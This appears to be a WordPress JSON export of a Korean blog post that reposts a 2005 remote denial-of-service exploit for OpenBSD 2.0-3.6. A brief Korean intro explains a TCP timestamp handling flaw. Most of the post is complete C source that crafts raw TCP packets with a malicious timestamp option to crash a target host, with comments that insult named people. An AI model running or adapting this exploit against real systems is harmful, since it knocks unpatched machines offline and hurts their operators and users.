{"id":17,"date":"2010-04-17T17:20:31","date_gmt":"2010-04-18T02:20:31","guid":{"rendered":"\/blog\/?p=17"},"modified":"2023-09-21T09:41:25","modified_gmt":"2023-09-21T00:41:25","slug":"openbsd-2-0-3-6-%ec%9b%90%ea%b2%a9%eb%8f%84%ec%8a%a4%ea%b3%b5%ea%b2%a9-%ec%b7%a8%ec%95%bd%ec%a0%90","status":"publish","type":"post","link":"https:\/\/hasu0707.duckdns.org\/blog\/?p=17","title":{"rendered":"OpenBSD 2.0-3.6 \uc6d0\uaca9\ub3c4\uc2a4\uacf5\uaca9 \ucde8\uc57d\uc810"},"content":{"rendered":"\n

2005\ub144 3\uc6d4 21\uc77c\uc5d0 \ubc1c\ud45c\ub41c \ucf54\ub4dc\ub85c
OpenBSD 2.0-3.6 \uc5d0 \uc788\ub294 DOS \uacf5\uaca9 \ucde8\uc57d\uc810\uc744 \uc774\uc6a9\ud574 \uacf5\uaca9\uc744 \uc2e4\ud589\ud558\ub294<\/FONT><\/P>\n

\ucf54\ub4dc \uc785\ub2c8\ub2e4. \uc704\ud5d8\ub3c4\ub294 \"\uc0c1\"\uae09\uc5d0 \uc18d\ud558\uace0 roman \uc774\ub77c\ub294 \uc0ac\ub78c\uc774<\/FONT><\/P>\n

\ub9cc\ub4e4\uc5c8\uc2b5\ub2c8\ub2e4.<\/FONT><\/P>\n

 <\/P>\n

TCP Stack\uc5d0\uc11c \ubc1c\uacac\ub41c \uc774 \ubc84\uadf8\ub294 TCP TimeOut \ucc98\ub9ac\uc5d0\uc11c \ubc1c\uc0dd\ud558\ub294<\/FONT><\/P>\n

\uc720\ud6a8\ud558\uc9c0 \ubabb\ud55c \uc778\uc790\ub97c  \ud5c8\ub77d\ud558\ub294\ub370\uc11c \uae30\uc778\ud558\uba70 TCP TimeStamp\uc5d0\uc11c<\/FONT><\/P>\n

\ud2b9\uc815\uac12\uc744 \uc804\uc1a1\ud568\uc73c\ub85c\uc368 \uc2dc\uc2a4\ud15c\uc744 \ub9c8\ube44\uc2dc\ud0ac \uc218 \uc788\uc2b5\ub2c8\ub2e4.<\/FONT><\/P>\n

 <\/P>\n

\ucd9c\ucc98: <\/FONT>http:\/\/rst.void.ru\/download\/r57obsd-dos.c<\/FONT><\/A><\/P>\n

 <\/P>\n

#include <stdio.h>
#include <ctype.h>
#include <sys\/socket.h>
#include <netinet\/in.h>
#include <netinet\/in_systm.h>
#include <netinet\/ip.h>
#include <netinet\/tcp.h>
#include <sysexits.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys\/types.h><\/FONT><\/P>\n

#ifndef TCPOPTLEN
 #define TCPOPTLEN 12
#endif
#define UMASK 0xffff
#define TIMESTAMP 0x7b000000 \/\/ 123 in hex - change it, this will probably help
\/\/ <\/FONT>ftp:\/\/ftp.openbsd.org\/pub\/OpenBSD\/patches\/3.6\/common\/010_rtt.patch<\/FONT><\/A><\/P>\n

\/*
ANY MODIFIED REPUBLISHING IS RESTRICTED
OpenBSD 2.0 - 3.6 Remote DoS Exploit
Tested under OpenBSD 3.6 at OpenBSD 3.5\/3.6
Vuln by OpenBSD errata, <\/FONT>http:\/\/www.openbsd.org\/errata.html<\/FONT><\/A>
(c)oded by __blf 2005 RusH Security Team, <\/FONT>http:\/\/rst.void.ru<\/FONT><\/A>
Public version - change TimeStamp to cause System Crash
Gr33tz: zZz, Phoenix, MishaSt, Inck-Vizitor, BlackPrince
Fuck lamerz: Saint_I, nmalykh, Mr.Clumsy, RooD aka MapycyA
All rights reserved.
ANY MODIFIED REPUBLISHING IS RESTRICTED
*\/<\/FONT><\/P>\n

#define _BSD_SOURCE<\/FONT><\/P>\n

u_short checksum(unsigned short * addr, int len)
{
    u_int32_t cksum  = 0;
    while(len > 0)
    {
        cksum += *addr++;
        len -= 2;
    }
    if(len == 0)
    {
        cksum += *(u_char *)addr;
    }
    cksum = (cksum >> 16) + (cksum & UMASK);
    cksum = cksum + (cksum >> 16);
    return (~cksum);
}<\/FONT><\/P>\n

int main(int argc, char ** argv)
{
    struct in_addr src, dst;
    struct sockaddr_in sin;
    struct ip * iph;
    struct tcphdr * tcph;
    struct _pseudoheader
    {
        struct in_addr src_addr;
        struct in_addr dest_addr;
        u_char zero;
        u_char protocol;
        u_short length;
    }
    pseudoheader;
    u_char * packet;
    u_char * pseudopacket;
    int mysock;
    int on = 1;
    u_char * ts;
    u_int32_t val = TIMESTAMP;
    if( argc != 4)
    {
        fprintf(stderr, \"r57obsd-dos.c by __blf\\n\");
        fprintf(stderr, \"RusH Security Team\\n\");
        fprintf(stderr, \"Usage: %s <source ip> <dest ip> <dest port>\\n\", argv[0]);
        return EX_USAGE;
    }
    if ((packet = (char *)malloc(sizeof(struct ip) + sizeof(struct tcphdr) + TCPOPTLEN)) == NULL)
    {
        perror(\"malloc\");
        return EX_OSERR;
    }
    inet_aton(argv[1], &src);
    inet_aton(argv[2], &dst);
    iph = (struct ip *) packet;
    iph->ip_v = IPVERSION;
    iph->ip_hl = 5;
    iph->ip_tos = 0;
    iph->ip_len = ntohs(sizeof(struct ip) + sizeof(struct tcphdr) + TCPOPTLEN);
    iph->ip_off = htons(IP_DF);
    iph->ip_ttl = 255;
    iph->ip_p = IPPROTO_TCP;
    iph->ip_sum = 0;
    iph->ip_src = src;
    iph->ip_dst = dst;
    tcph = (struct tcphdr *)(packet +sizeof(struct ip));
    tcph->th_sport = htons(rand()); \/\/ just random
    tcph->th_dport = htons(atoi(argv[3]));
    tcph->th_seq = htonl(rand());
    tcph->th_ack = htonl(rand());
    tcph->th_off = 5 + (TCPOPTLEN >> 2);
    tcph->th_flags = TH_ACK;
    tcph->th_win = htons(512);
    tcph->th_urp = 0;
    ts = (unsigned char *)(packet + sizeof(struct ip) + sizeof(struct tcphdr));
    ts[0] = ts[1] = 1;
    ts[2] = 8;
    ts[3] = 10;
    memcpy(ts+4, &val, 4);
    memset(ts+8, 0, 4);
    pseudoheader.src_addr = src;
    pseudoheader.dest_addr = dst;
    pseudoheader.zero = 0;
    pseudoheader.protocol = IPPROTO_TCP;
    pseudoheader.length = htons(sizeof(struct tcphdr) + TCPOPTLEN);
    if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr) + TCPOPTLEN)) == NULL)
    {
        perror(\"malloc()\");
        return EX_OSERR;
    }
    memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader));
    memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr) + TCPOPTLEN);
    tcph->th_sum = checksum((unsigned short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr) + TCPOPTLEN);
    mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW);
    if(!mysock)
    {
        perror(\"socket!\\n\");
        return EX_OSERR;
    }
    if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1)
    {
        perror(\"setsockopt\");
        shutdown(mysock, 2);
        return EX_OSERR;
    }
    sin.sin_family = PF_INET;
    sin.sin_addr = dst;
    sin.sin_port = htons(atoi(argv[3])); \/\/ doesn't really matter
    if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr) + TCPOPTLEN, 0, (struct sockaddr *)&sin, sizeof(sin)) == -1)
    {
        perror(\"sendto()\\n\");
        shutdown(mysock, 2);
        return EX_NOHOST;
    }
    printf(\"Packet sent. Remote machine should crash.\\n\");
    shutdown(mysock, 2);
    return  EX_OK;
}
<\/FONT><\/P>\n

\ucc38\uace0: http:\/\/blog.naver.com\/rainst?Redirect=Log&logNo=11349292 \n<\/A><\/FONT>\n<\/FONT>\n","protected":false},"excerpt":{"rendered":"

2005\ub144 3\uc6d4 21\uc77c\uc5d0 \ubc1c\ud45c\ub41c \ucf54\ub4dc\ub85c OpenBSD 2.0-3.6 \uc5d0 \uc788\ub294 DOS \uacf5\uaca9 \ucde8\uc57d\uc810\uc744 \uc774\uc6a9\ud574 \uacf5\uaca9\uc744 \uc2e4\ud589\ud558\ub294 \ucf54\ub4dc \uc785\ub2c8\ub2e4. \uc704\ud5d8\ub3c4\ub294 “\uc0c1”\uae09\uc5d0 \uc18d\ud558\uace0 roman \uc774\ub77c\ub294 \uc0ac\ub78c\uc774 \ub9cc\ub4e4\uc5c8\uc2b5\ub2c8\ub2e4.   TCP Stack\uc5d0\uc11c \ubc1c\uacac\ub41c \uc774 \ubc84\uadf8\ub294 TCP TimeOut \ucc98\ub9ac\uc5d0\uc11c \ubc1c\uc0dd\ud558\ub294 \uc720\ud6a8\ud558\uc9c0 \ubabb\ud55c \uc778\uc790\ub97c  \ud5c8\ub77d\ud558\ub294\ub370\uc11c \uae30\uc778\ud558\uba70 TCP TimeStamp\uc5d0\uc11c \ud2b9\uc815\uac12\uc744 \uc804\uc1a1\ud568\uc73c\ub85c\uc368 \uc2dc\uc2a4\ud15c\uc744 \ub9c8\ube44\uc2dc\ud0ac \uc218 \uc788\uc2b5\ub2c8\ub2e4.   \ucd9c\ucc98: http:\/\/rst.void.ru\/download\/r57obsd-dos.c   #include <stdio.h>#include <ctype.h>#include <sys\/socket.h>#include […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_import_markdown_pro_load_document_selector":0,"_import_markdown_pro_submit_text_textarea":"","site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"categories":[39],"tags":[],"class_list":["post-17","post","type-post","status-publish","format-standard","hentry","category-os_linux_unix_macos"],"_links":{"self":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/posts\/17","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=17"}],"version-history":[{"count":0,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=\/wp\/v2\/posts\/17\/revisions"}],"wp:attachment":[{"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=17"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=17"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hasu0707.duckdns.org\/blog\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=17"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}